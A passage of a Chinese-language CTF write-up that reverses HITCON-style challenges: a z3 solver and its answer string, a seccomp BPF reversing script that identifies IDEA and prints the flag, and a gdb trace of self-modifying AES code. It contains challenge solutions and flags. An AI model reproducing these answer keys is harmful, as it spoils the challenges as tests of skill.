class="built_in">sum</span> = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(cparameter):</span><br><span class="line"> p = d[oparameter+i*<span class="number">2</span>]*<span class="number">20</span>+d[oparameter+i*<span class="number">2</span>+<span class="number">1</span>]</span><br><span class="line"> s.add(x[p]><span class="number">0</span>)</span><br><span class="line"> s.add(x[p]<=<span class="number">9</span>)</span><br><span class="line"> s.add((flag>>x[p])&<span class="number">1</span>!=<span class="number">1</span>)</span><br><span class="line"> flag |= <span class="number">1</span><<x[p]</span><br><span class="line"> <span class="built_in">sum</span>+=x[p]</span><br><span class="line"> s.add(<span class="built_in">sum</span>==final)</span><br><span class="line"><span class="built_in">print</span> s.check()</span><br><span class="line"><span class="keyword">if</span> s.check() == z3.sat:</span><br><span class="line"> m = s.model()</span><br><span class="line"> <span class="built_in">print</span> m</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> sym: m[sym], x)</span><br><span class="line"> <span class="built_in">print</span> flag</span><br></pre></td></tr></table></figure>
<p>跑出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 9, 2, None, None, None, None, 4, 1, None, None, None, None, 9, 1, None, 1, 7, None, 3, 7, 8, 1, 9, 2, None, None, 6, 3, 8, None, 4, 6, 8, 3, None, 2, 9, 6, 1, 8, None, None, 8, 1, None, 7, 1, None, 9, 8, 3, 7, None, None, None, None, 8, 9, None, 9, 2, None, None, None, None, 9, 3, 6, None, 9, 1, 5, None, None, None, None, None, 8, 1, None, 1, 2, None, None, None, 8, 2, 1, 6, None, 2, 8, 4, 3, None, None, None, None, 3, 1, None, 1, 2, None, None, None, None, 4, 9, 8, None, 9, 3, 1, None, 3, 7, None, None, 2, 9, 3, 4, 1, None, None, None, 3, 7, 9, 2, None, 6, 2, None, 1, 9, 2, 8, 3, 7, None, 1, 2, None, 7, 1, 2, 8, None, 1, 7, 2, None, None, None, None, 1, 9, None, None, None, None, None, None, 9, 2, None, None, None, None, 9, 1, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 1, 4, None, 6, 5, None, None, None, 2, 7, 1, None, 4, 9, None, None, None, None, 4, 1, 8, 3, 5, 7, 9, 2, None, None, 8, 9, 6, 4, 1, 2, 7, 5, None, 1, 2, 5, None, 1, 3, None, 7, 3, None, 9, 1, None, None, 5, 3, None, 3, 7, None, 7, 6, None, 7, 2, None, 8, 6, None, None, 8, 6, None, None, None, 2, 6, None, None, None, None, 9, 4, 8, None, 5, 1, 2, None, None, None, 5, 3, None, None, None, 3, 6, None, None, None, 5, 7, None, 1, 8, None, 8, 6, None, None, None, 5, 2, None, None, None, 5, 1, None, 4, 8, None, 4, 9, None, 5, 3, 8, None, 8, 5, None, 6, 9, None, None, 8, 5, None, 1, 7, 8, 6, 3, 2, 9, 4, None, None, 7, 3, 6, 1, 5, 2, 8, 4, None, None, None, 3, 1, None, 7, 4, None, None, None, None, None, None, 3, 5, None, 1, 2, 3, None]</span><br></pre></td></tr></table></figure>
<p>然后<code>"".join(['0' if x==None else str(x) for x in a])</code><br>得到答案<code>0000000000000000000000000092000041000091017037819200638046830296180081071098370000890920000936091500000810120008216028430000310120000498093103700293410003792062019283701207128017200001900000092000091000000000000000000000000014065000271049000041835792008964127501250130730910053037076072086008600026000094805120005300036000570180860005200051048049053808506900850178632940073615284000310740000003501230</code></p>
<h2 id="Seccomp"><a href="#Seccomp" class="headerlink" title="Seccomp"></a>Seccomp</h2><p>bpf reverse<br>首先用工具把汇编导出来,然后观察了一阵发现一共有几个pattern,写一个脚本让流程看的更清楚一点</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">parse</span>():</span><br><span class="line"> s = <span class="built_in">open</span>(<span class="string">'dis.txt'</span>, <span class="string">'rb'</span>).read()</span><br><span class="line"> s = s.replace(<span class="string">'\r'</span>, <span class="string">''</span>).split(<span class="string">'\n'</span>)</span><br><span class="line"> o = []</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line"> t = i.split(<span class="string">'\t'</span>)[<span class="number">1</span>].split(<span class="string">' '</span>)</span><br><span class="line"> o.append(<span class="built_in">map</span>(<span class="keyword">lambda</span> x: x.replace(<span class="string">','</span>, <span class="string">''</span>), t))</span><br><span class="line"> <span class="keyword">return</span> o</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run</span>(<span class="params">ins</span>):</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">is_match</span>(<span class="params">src,seq</span>):</span><br><span class="line"> seq_c = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(seq)):</span><br><span class="line"> <span class="keyword">if</span> src[k][<span class="number">0</span>] == seq[k]:</span><br><span class="line"> seq_c +=<span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> seq_c==<span class="built_in">len</span>(seq):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">True</span>,[src[<span class="number">0</span>][<span class="number">1</span>],src[-<span class="number">1</span>][<span class="number">1</span>]]</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span>,[]</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">opd</span>(<span class="params">s</span>):</span><br><span class="line"> <span class="keyword">if</span> s.startswith(<span class="string">'['</span>) <span class="keyword">and</span> s.endswith(<span class="string">']'</span>):</span><br><span class="line"> i = <span class="built_in">int</span>(s[<span class="number">1</span>:-<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0x1337</span></span><br><span class="line"> <span class="keyword">return</span> x[(i - <span class="number">16</span>) / <span class="number">4</span>]</span><br><span class="line"> <span class="keyword">elif</span> s.startswith(<span class="string">'#'</span>):</span><br><span class="line"> t = s[<span class="number">1</span>:]</span><br><span class="line"> <span class="keyword">if</span> t.startswith(<span class="string">'0x'</span>):</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">int</span>(t, <span class="number">16</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">int</span>(t, <span class="number">10</span>)</span><br><span class="line"> <span class="keyword">elif</span> s.startswith(<span class="string">'M['</span>) <span class="keyword">and</span> s.endswith(<span class="string">']'</span>):</span><br><span class="line"> <span class="keyword">return</span> M[<span class="built_in">int</span>(s[<span class="number">2</span>:-<span class="number">1</span>])]</span><br><span class="line"> <span class="keyword">elif</span> s == <span class="string">'x'</span>:</span><br><span class="line"> <span class="keyword">return</span> X</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span> s</span><br><span class="line"> <span class="keyword">raise</span> Exception(<span class="string">'wtf'</span>)</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">p16</span>(<span class="params">a</span>):</span><br><span class="line"> <span class="keyword">return</span> struct.pack(<span class="string">">H"</span>,a)</span><br><span class="line"> idx = <span class="number">17</span></span><br><span class="line"> key = []</span><br><span class="line"> <span class="keyword">while</span> idx < <span class="built_in">len</span>(ins):</span><br><span class="line"> i = ins[idx]</span><br><span class="line"> op = i[<span class="number">0</span>]</span><br><span class="line"> <span class="keyword">if</span> op == <span class="string">'ld'</span>:</span><br><span class="line"> seq = [<span class="string">'ld'</span>,<span class="string">'jeq'</span>,<span class="string">'ld'</span>,<span class="string">'mul'</span>,<span class="string">'tax'</span>,<span class="string">'div'</span>,<span class="string">'mul'</span>,<span class="string">'neg'</span>,<span class="string">'add'</span>,<span class="string">'jeq'</span>,<span class="string">'ld'</span>,<span class="string">'st'</span>]</span><br><span class="line"> res = is_match(ins[idx:idx+<span class="built_in">len</span>(seq)],seq)</span><br><span class="line"> <span class="keyword">if</span> res[<span class="number">0</span>]:</span><br><span class="line"> <span class="comment">#print "%s = %s * %d %% 0x10001"%(res[1][1],res[1][0],opd(ins[idx+3][1]))</span></span><br><span class="line"> key.append(struct.pack(<span class="string">">H"</span>,opd(ins[idx+<span class="number">3</span>][<span class="number">1</span>])))</span><br><span class="line"> idx+=<span class="built_in">len</span>(seq)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> seq = [<span class="string">'ld'</span>,<span class="string">'add'</span>,<span class="string">'and'</span>,<span class="string">'st'</span>]</span><br><span class="line"> res = is_match(ins[idx:idx+<span class="built_in">len</span>(seq)],seq)</span><br><span class="line"> <span class="keyword">if</span> res[<span class="number">0</span>]:</span><br><span class="line"> <span class="comment">#print "%s = (%s + %d) & 0xffff"%(res[1][1],res[1][0],opd(ins[idx+1][1]))</span></span><br><span class="line"> key.append(struct.pack(<span class="string">">H"</span>,opd(ins[idx+<span class="number">1</span>][<span class="number">1</span>])))</span><br><span class="line"> idx+=<span class="built_in">len</span>(seq)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> seq = [<span class="string">'ld'</span>,<span class="string">'ldx'</span>,<span class="string">'xor'</span>,<span class="string">'st'</span>]</span><br><span class="line"> res = is_match(ins[idx:idx+<span class="built_in">len</span>(seq)],seq)</span><br><span class="line"> <span class="keyword">if</span> res[<span class="number">0</span>]:</span><br><span class="line"> <span class="comment">#print "%s = %s ^ %s"%(res[1][1],res[1][0],ins[idx+1][1])</span></span><br><span class="line"> idx+=<span class="built_in">len</span>(seq)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> seq = [<span class="string">'ld'</span>,<span class="string">'ldx'</span>,<span class="string">'add'</span>,<span class="string">'and'</span>,<span class="string">'st'</span>]</span><br><span class="line"> res = is_match(ins[idx:idx+<span class="built_in">len</span>(seq)],seq)</span><br><span class="line"> <span class="keyword">if</span> res[<span class="number">0</span>]:</span><br><span class="line"> <span class="comment">#print "%s = (%s + %s) & 0xffff"%(res[1][1],res[1][0],ins[idx+1][1])</span></span><br><span class="line"> idx+=<span class="built_in">len</span>(seq)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> seq = [<span class="string">'ld'</span>,<span class="string">'ldx'</span>,<span class="string">'stx'</span>,<span class="string">'st'</span>]</span><br><span class="line"> res = is_match(ins[idx:idx+<span class="built_in">len</span>(seq)],seq)</span><br><span class="line"> <span class="keyword">if</span> res[<span class="number">0</span>]:</span><br><span class="line"> <span class="comment">#print "swap(%s,%s)"%(res[1][1],res[1][0])</span></span><br><span class="line"> idx+=<span class="built_in">len</span>(seq)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="built_in">print</span> idx,<span class="string">"error"</span></span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">elif</span> op==<span class="string">'ldx'</span>:</span><br><span class="line"> enc = p16(opd(ins[idx][<span class="number">1</span>])^opd(ins[idx+<span class="number">3</span>+<span class="number">12</span>][<span class="number">1</span>]))+p16(opd(ins[idx][<span class="number">1</span>])^opd(ins[idx+<span class="number">3</span>+<span class="number">8</span>][<span class="number">1</span>]))+p16(opd(ins[idx][<span class="number">1</span>])^opd(ins[idx+<span class="number">3</span>+<span class="number">4</span>][<span class="number">1</span>]))+p16(opd(ins[idx][<span class="number">1</span>])^opd(ins[idx+<span class="number">3</span>][<span class="number">1</span>]))</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"d = '%s'.decode('hex')"</span>%enc.encode(<span class="string">'hex'</span>)</span><br><span class="line"> idx+=<span class="number">31</span></span><br><span class="line"> <span class="built_in">print</span> <span class="string">'key = "%s"'</span>%<span class="string">""</span>.join(key)[:<span class="number">16</span>]</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"cipher = IDEA.new(key,IDEA.MODE_ECB,)\na.append(cipher.decrypt(d)[::-1])"</span></span><br><span class="line"> key = []</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="built_in">print</span> ins[idx]</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"error"</span></span><br><span class="line"> exit()</span><br><span class="line">ins = parse()</span><br><span class="line">run(ins)</span><br></pre></td></tr></table></figure>
<p>会发现输入是4个word输出4个word,然后8轮这样的算法,确定是IDEA,改一下上面的脚本输出解密代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">M[0] = M[0] * 26465 % 0x10001</span><br><span class="line">M[1] = (M[1] + 27750) & 0xffff</span><br><span class="line">M[2] = (M[2] + 24421) & 0xffff</span><br><span class="line">M[3] = M[3] * 27489 % 0x10001</span><br><span class="line">M[4] = M[0] ^ M[2]</span><br><span class="line">M[5] = M[1] ^ M[3]</span><br><span class="line">M[4] = M[4] * 26207 % 0x10001</span><br><span class="line">M[5] = (M[4] + M[5]) & 0xffff</span><br><span class="line">M[5] = M[5] * 24927 % 0x10001</span><br><span class="line">M[4] = (M[4] + M[5]) & 0xffff</span><br><span class="line">M[0] = M[0] ^ M[5]</span><br><span class="line">M[1] = M[1] ^ M[4]</span><br><span class="line">M[2] = M[2] ^ M[5]</span><br><span class="line">M[3] = M[3] ^ M[4]</span><br><span class="line">swap(M[2],M[1])</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> CryptoPlus.Cipher <span class="keyword">import</span> IDEA</span><br><span class="line">a = []</span><br><span class="line">d = <span class="string">'bda9a256044419b0'</span>.decode(<span class="string">'hex'</span>)</span><br><span class="line">key = <span class="string">"galf_ekaf_a_ma_I"</span></span><br><span class="line">cipher = IDEA.new(key,IDEA.MODE_ECB,)</span><br><span class="line">a.append(cipher.decrypt(d)[::-<span class="number">1</span>])</span><br><span class="line">d = <span class="string">'888c2d1a2d5580cd'</span>.decode(<span class="string">'hex'</span>)</span><br><span class="line">key = <span class="string">"ver_yr7_n0_emoC_"</span></span><br><span class="line">cipher = IDEA.new(key,IDEA.MODE_ECB,)</span><br><span class="line">a.append(cipher.decrypt(d)[::-<span class="number">1</span>])</span><br><span class="line">d = <span class="string">'a0a7aab80005558d'</span>.decode(<span class="string">'hex'</span>)</span><br><span class="line">key = <span class="string">"nikxxf_siht_esre"</span></span><br><span class="line">cipher = IDEA.new(key,IDEA.MODE_ECB,)</span><br><span class="line">a.append(cipher.decrypt(d)[::-<span class="number">1</span>])</span><br><span class="line">d = <span class="string">'dff79b5d009e1498'</span>.decode(<span class="string">'hex'</span>)</span><br><span class="line">key = <span class="string">"!selur_pmocces_g"</span></span><br><span class="line">cipher = IDEA.new(key,IDEA.MODE_ECB,)</span><br><span class="line">a.append(cipher.decrypt(d)[::-<span class="number">1</span>])</span><br><span class="line">d = <span class="string">'8fd875f0c7ef4e09'</span>.decode(<span class="string">'hex'</span>)</span><br><span class="line">key = <span class="string">"galf_ekaf_a_ma_I"</span></span><br><span class="line">cipher = IDEA.new(key,IDEA.MODE_ECB,)</span><br><span class="line">a.append(cipher.decrypt(d)[::-<span class="number">1</span>])</span><br><span class="line"><span class="built_in">print</span> <span class="string">"hitcon{%s}"</span>%<span class="string">""</span>.join(a)</span><br><span class="line"></span><br><span class="line">hitcon{w0w_y0u_are_Master-0F-secc0mp///>_w_<///</span><br></pre></td></tr></table></figure>
<h2 id="家徒四壁Everlasting-Imaginative-Void"><a href="#家徒四壁Everlasting-Imaginative-Void" class="headerlink" title="家徒四壁Everlasting Imaginative Void"></a>家徒四壁<del>Everlasting Imaginative Void</del></h2><p>debug</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br></pre></td><td class="code"><pre><span class="line">0x000000e719e62000 0x000000e719e63000 r-xp /tmp/void-1b63cbab5d58da4294c2f97d6b60f568</span><br><span class="line">0x000000e71a062000 0x000000e71a063000 r--p /tmp/void-1b63cbab5d58da4294c2f97d6b60f568</span><br><span class="line">0x000000e71a063000 0x000000e71a064000 rw-p /tmp/void-1b63cbab5d58da4294c2f97d6b60f568</span><br><span class="line"></span><br><span class="line">=> 0xe719e62935: call 0xe719e62284</span><br><span class="line"> 0xe719e6293a: push 0xa</span><br><span class="line"> 0xe719e6293c: pop rax</span><br><span class="line"> 0xe719e6293d: push rdi</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">=> 0xe719e62284: pop rdi</span><br><span class="line"> 0xe719e62285: mov al,BYTE PTR [rdi+0x200715]</span><br><span class="line"> 0xe719e6228b: cmp al,0x21</span><br><span class="line"> 0xe719e6228d: jne 0xe719e62297</span><br><span class="line"></span><br><span class="line">!</span><br><span class="line"></span><br><span class="line">RAX: 0xe71a062e48 --> 0x1c</span><br><span class="line">RBX: 0x7f52f7cb1168 --> 0xe719e62000 --> 0x10102464c457f</span><br><span class="line">RCX: 0x4</span><br><span class="line">RDX: 0x1</span><br><span class="line">RSI: 0x0</span><br><span class="line">RDI: 0x7f52f7cb0948 --> 0x0</span><br><span class="line">RBP: 0x7ffe684992c0 --> 0x7f52f7a845f8 --> 0x7f52f7a85c40 --> 0x0</span><br><span class="line">RSP: 0x7ffe684991f0 --> 0xe719e6293a --> 0x3aef816657580a6a</span><br><span class="line">RIP: 0xe719e62284 --> 0x3c00200715878a5f</span><br><span class="line">R8 : 0x4</span><br><span class="line">R9 : 0x3</span><br><span class="line">R10: 0x7ffe68499218 --> 0x7f52f7cb09d8 --> 0x7f52f7a8a000 --> 0x10102464c457f</span><br><span class="line">R11: 0x3</span><br><span class="line">R12: 0xe71a062dd0 --> 0xe719e626b0 (cmp BYTE PTR [rip+0x200969],0x0 # 0xe71a063020)</span><br><span class="line">R13: 0x1</span><br><span class="line">R14: 0x7ffe68499200 --> 0x7f52f7cb1168 --> 0xe719e62000 --> 0x10102464c457f</span><br><span class="line">R15: 0x0</span><br><span class="line">EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)</span><br><span class="line">[-------------------------------------code-------------------------------------]</span><br><span class="line">=> 0xe719e62284: pop rdi</span><br><span class="line"> 0xe719e62285: mov al,BYTE PTR [rdi+0x200715]</span><br><span class="line"> 0xe719e6228b: cmp al,0x21</span><br><span class="line"> 0xe719e6228d: jne 0xe719e62297</span><br><span class="line">[------------------------------------stack-------------------------------------]</span><br><span class="line">0000| 0x7ffe684991f0 --> 0xe719e6293a --> 0x3aef816657580a6a</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sys_mprotect(0xe719e62000,0x1000)</span><br><span class="line">RSI: 0x1000</span><br><span class="line">RDI: 0xe719e62000 --> 0x10102464c457f</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> 0xe719e62284: pop rdi</span><br><span class="line"> 0xe719e62285: mov al,BYTE PTR [rdi+0x200715]</span><br><span class="line"> 0xe719e6228b: cmp al,0x21</span><br><span class="line"> 0xe719e6228d: jne 0xe719e62297</span><br><span class="line"> 0xe719e6228f: call rdi</span><br><span class="line"> 0xe719e62291: add rdi,0x15</span><br><span class="line"> 0xe719e62295: jmp rdi</span><br><span class="line"> 0xe719e62297: ret</span><br><span class="line"></span><br><span class="line">.eh_frame:000000000000094F xor ecx, ecx</span><br><span class="line">.eh_frame:0000000000000951 add di, 0FEF9h</span><br><span class="line">.eh_frame:0000000000000956 push rdi</span><br><span class="line">.eh_frame:0000000000000957 push rdi</span><br><span class="line">.eh_frame:0000000000000958 pop rsi</span><br><span class="line">.eh_frame:0000000000000959 pop rbx</span><br><span class="line">.eh_frame:000000000000095A</span><br><span class="line">.eh_frame:000000000000095A loc_95A: ; CODE XREF: .eh_frame:0000000000000965j</span><br><span class="line">.eh_frame:000000000000095A mov cl, [rsi]</span><br><span class="line">.eh_frame:000000000000095C test cl, cl</span><br><span class="line">.eh_frame:000000000000095E js short loc_967</span><br><span class="line">.eh_frame:0000000000000960 inc rsi</span><br><span class="line">.eh_frame:0000000000000963 rep movsb</span><br><span class="line">.eh_frame:0000000000000965 jmp short loc_95A</span><br><span class="line">.eh_frame:0000000000000967 ; ---------------------------------------------------------------------------</span><br><span class="line">.eh_frame:0000000000000967</span><br><span class="line">.eh_frame:0000000000000967 loc_967: ; CODE XREF: .eh_frame:000000000000095Ej</span><br><span class="line">.eh_frame:0000000000000967 add bx, 17h</span><br><span class="line">.eh_frame:000000000000096B jmp rbx</span><br><span class="line"></span><br><span class="line"> 0xe719e6285f: mov rsi,rbx</span><br><span class="line"> 0xe719e62862: sub si,0xc7</span><br><span class="line"> 0xe719e62867: add rbx,0x2007e1</span><br><span class="line"> 0xe719e6286e: movdqu xmm1,XMMWORD PTR [rbx];input</span><br><span class="line"> 0xe719e62872: movdqu xmm0,XMMWORD PTR [rsi];0xfffe07e803fdc148 0xdb312074ed8548ff</span><br><span class="line"> 0xe719e62876: pxor xmm1,xmm0</span><br><span class="line"> 0xe719e6287a: push 0xa</span><br><span class="line"> 0xe719e6287c: pop rdi</span><br><span class="line"> 0xe719e6287d: add rsi,0x10</span><br><span class="line"> 0xe719e62881: movdqu xmm0,XMMWORD PTR [rsi]</span><br><span class="line"> 0xe719e62885: dec edi</span><br><span class="line"> 0xe719e62887: test edi,edi</span><br><span class="line"> 0xe719e62889: je 0xe719e62894</span><br><span class="line"> 0xe719e6288b: js 0xe719e6289b negative</span><br><span class="line">=> 0xe719e6288d: aesenc xmm1,xmm0</span><br><span class="line"> 0xe719e62892: jmp 0xe719e6287d</span><br><span class="line"> 0xe719e62894: aesenclast xmm1,xmm0</span><br><span class="line"> 0xe719e62899: jmp 0xe719e6287d</span><br><span class="line"> 0xe719e6289b: ucomisd xmm0,xmm1</span><br><span class="line"> 0xe719e6289f: je 0xe719e628a2</span><br><span class="line"> 0xe719e628a1: ret</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">_mm_aesenclast_si128</span><br><span class="line">_mm_aesenc_si128</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">aesenc xmm1,xmm0 0x10 times</span><br><span class="line">aesenclast xmm1,xmm0</span><br><span class="line">cmp xmm0,xmm1</span><br><span class="line"></span><br><span class="line"> 0xe719e628a2: neg edi</span><br><span class="line"> 0xe719e628a4: push rdi</span><br><span class="line"> 0xe719e628a5: pop rax</span><br><span class="line"> 0xe719e628a6: add rsi,0x10</span><br><span class="line"> 0xe719e628aa: call 0xe719e62948</span><br><span class="line"></span><br><span class="line"> 0xe719e62948: push 0x7</span><br><span class="line"> 0xe719e6294a: pop rdx</span><br><span class="line"> 0xe719e6294b: syscall</span><br><span class="line"> 0xe719e6294d: pop rdi</span><br><span class="line"> 0xe719e6294e: ret</span><br><span class="line"></span><br><span class="line"> gdb-peda$ x/10gx $rsi</span><br><span class="line">0xe719e62798: 0xfffe07e803fdc148,0xdb312074ed8548ff ; init</span><br><span class="line"></span><br><span class="line">0xe719e627a8: 0x0000000000841f0f,0x8944f6894cea894c</span><br><span class="line">0xe719e627b8: 0xc38348dc14ff41ff,0x8348ea75dd394801</span><br><span class="line">0xe719e627c8: 0x5d415c415d5b08c4,0x2e6690c35f415e41</span><br><span class="line">0xe719e627d8: 0x0000000000841f0f,0x08ec83480000c3f3</span><br><span class="line">0xe719e627e8: 0x000000c308c48348,0x6800732500020001</span><br><span class="line">0xe719e627f8: 0x73257b6e6f637469,0x3b031b0100000a7d</span><br><span class="line">0xe719e62808: 0x0000000700000040,0x0000008cfffffdbc</span><br><span class="line">0xe719e62818: 0x000000b4fffffdcc,0x0000005cfffffdec</span><br><span class="line">0xe719e62828: 0x000000ccffffff1c,0x000000ecffffff57</span><br><span class="line">0xe719e62838: 0x0000010cffffff6c,0x00000154ffffffdc</span><br><span class="line">0xe719e62848: 